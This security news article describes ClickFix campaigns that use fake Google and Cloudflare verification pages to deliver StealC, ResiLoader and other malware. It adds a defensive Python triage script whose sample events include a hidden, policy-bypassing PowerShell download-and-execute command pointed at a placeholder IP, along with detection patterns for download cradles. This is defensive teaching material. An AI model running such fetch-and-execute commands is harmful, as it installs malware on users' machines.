Fake Google, Cloudflare Verification Pages Fuel ClickFix Campaigns, Distribute StealC, Amatera, CastleLoader, New ResiLoader
- Threat Overview: An ongoing ClickFix campaign uses fake Google and Cloudflare verification pages to trick users into executing malicious PowerShell commands.
- Malware Delivered: It delivers multiple malware families and a newly identified loader dubbed ResiLoader.
- Changed Methods: Researchers observed attackers continually changing how they deliver fake verification pages that mimic trusted online services.
Multiple active ClickFix campaigns, which have been running since at least late 2025, abuse fake Google and Cloudflare verification pages to distribute a wide range of malware, including HijackLoader, StealC, Remus, Amatera Stealer, CastleLoader, NetSupport, a Rust-based stealer, and a previously undocumented loader called ResiLoader.
The campaigns target Windows users, who are tricked into following on-screen instructions on malicious or compromised websites. Cybersecurity researchers say the attacks delivering these malware families rely on social engineering rather than software exploits, so even fully patched systems can be compromised if users execute the provided commands.
ClickFix Delivers Undocumented Loader
In a new report, Malwarebytes documented new delivery chains and identified ResiLoader for the first time while observing an expansion of ClickFix lures. ResiLoader, which disables security software before deploying the StealC infostealer, was observed in one infection chain, where it was downloaded via a trojanized version of the legitimate Franz messaging app.
Victims are instructed to copy and execute PowerShell commands under the guise of completing a CAPTCHA, verifying they are human, fixing Google Meet audio issues, or authorizing a Google sign-in. The report said the campaigns share infrastructure despite using different lures.
The campaigns continue to evolve with new payloads and delivery methods, such as distributing payloads directly via IP addresses rather than via buckets.
Observed distribution methods include outdated or compromised websites, Cloudflare Pages, and fake online QR code generators.
How to Avoid Fake Google and Cloudflare Verification Scams
Malwarebytes stressed that legitimate services such as Google, Cloudflare, and Microsoft will never require users to paste PowerShell commands into Windows for verification or troubleshooting.
Keeping endpoint protection up to date and treating urgent verification prompts with caution can help reduce exposure to these attacks, which pose the greatest risk to remote employees, IT administrators, and users installing software or searching for free online tools (QR generators, converters, PDF tools).
Never:
- Paste commands into PowerShell because a website tells you to;
- Run commands copied to your clipboard without understanding them;
- Assume a page is legitimate simply because it displays Google or Cloudflare branding.
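The user-facing advice above has a telemetry counterpart: a ClickFix execution shows up as an interactive shell (explorer.exe, which launches what the user types into the Win+R Run dialog) spawning powershell.exe or cmd.exe with a hidden window, a download cradle, an encoded command or an execution-policy bypass. The following is an added example, not code from the original article or from Malwarebytes, that triages constructed process-creation events in a simplified Sysmon-style key=value format (the field names ParentImage, Image and CommandLine are an assumption about your telemetry; the IP address and base64 string are placeholders). It flags explorer-spawned shells with any ClickFix signal as high severity and non-interactive launches with two or more signals as medium.

```python
"""Triage process-creation events for the ClickFix pattern (added example, not from the article)."""
import re
from dataclasses import dataclass, field

# Constructed sample events (not real telemetry). 203.0.113.10 is a documentation address and the
# base64 blob is a placeholder, chosen so the sample carries no working command.
SAMPLE_EVENTS = [
    # 1: classic ClickFix launch from the Run dialog: hidden window, policy bypass, download-and-run
    r'ParentImage=C:\Windows\explorer.exe Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe '
    r'CommandLine=powershell -w hidden -ep bypass -c "iwr http://203.0.113.10/v | iex"',
    # 2: benign interactive PowerShell opened from the Start menu
    r'ParentImage=C:\Windows\explorer.exe Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe '
    r'CommandLine="powershell.exe"',
    # 3: scheduled admin script; one signal, non-interactive parent, should not be flagged
    r'ParentImage=C:\Windows\System32\services.exe Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe '
    r'CommandLine=powershell -ExecutionPolicy Bypass -File C:\scripts\backup.ps1',
    # 4: cmd wrapper around an encoded PowerShell command, again launched from explorer
    r'ParentImage=C:\Windows\explorer.exe Image=C:\Windows\System32\cmd.exe '
    r'CommandLine=cmd /c powershell -e QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB',
]

INTERACTIVE_PARENTS = {"explorer.exe"}             # Win+R / Run dialog and Start menu launches
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}  # interpreters named in ClickFix lures

# Each signal is one characteristic of the pasted command; none is malicious on its own.
SIGNALS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I),
    "download_cradle": re.compile(r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|curl|wget)\b", re.I),
    "in_memory_exec": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "encoded_command": re.compile(r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "bypass_policy": re.compile(r"-e(?:x(?:ecutionpolicy)?|p)\s+bypass\b", re.I),
}

FIELD_RE = re.compile(r"(?:^|\s)(ParentImage|Image|CommandLine)=")


@dataclass
class Finding:
    severity: str
    command_line: str
    signals: list = field(default_factory=list)


def parse_event(line: str) -> dict:
    """Parse 'Key=value Key=value' where values (notably CommandLine) may contain spaces."""
    matches = list(FIELD_RE.finditer(line))
    event = {}
    for i, m in enumerate(matches):
        end = matches[i + 1].start() if i + 1 < len(matches) else len(line)
        event[m.group(1)] = line[m.end():end].strip()
    return event


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path, e.g. 'C:\\Windows\\explorer.exe' -> 'explorer.exe'."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event: dict):
    """Return a Finding for a ClickFix-like launch, or None when the event looks benign."""
    cmd = event.get("CommandLine", "")
    hits = [name for name, rx in SIGNALS.items() if rx.search(cmd)]
    if not hits:
        return None
    interactive = basename(event.get("ParentImage", "")) in INTERACTIVE_PARENTS
    if interactive and basename(event.get("Image", "")) in SHELLS:
        return Finding("high", cmd, hits)      # a user-typed shell with suspicious switches
    if len(hits) >= 2:
        return Finding("medium", cmd, hits)    # worth a look even from a service or script host
    return None


def triage(lines):
    """Run classify() over raw event lines and keep only the findings."""
    return [f for f in (classify(parse_event(l)) for l in lines) if f is not None]


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"[{f.severity}] {', '.join(f.signals)}: {f.command_line}")
```

The split between "any signal from an interactive parent" and "two or more signals from anything else" is what keeps the scheduled backup script (event 3) quiet while still catching the two explorer-launched shells. On an endpoint suspected of a ClickFix infection, the same pasted command also survives in the Run dialog history under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, which is a useful cross-check against the process telemetry.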
Malwarebytes' findings add to a growing body of research from ReliaQuest and other security vendors showing that ClickFix has become one of the fastest-growing social engineering techniques in recent years.
Late last month, Europol announced the disruption of SocGholish, Amadey, and StealC malware in Operation Endgame and the recovery of 27 million stolen login credentials, and XLab observed a Ghost CMS SQL injection vulnerability that facilitates large-scale ClickFix campaigns.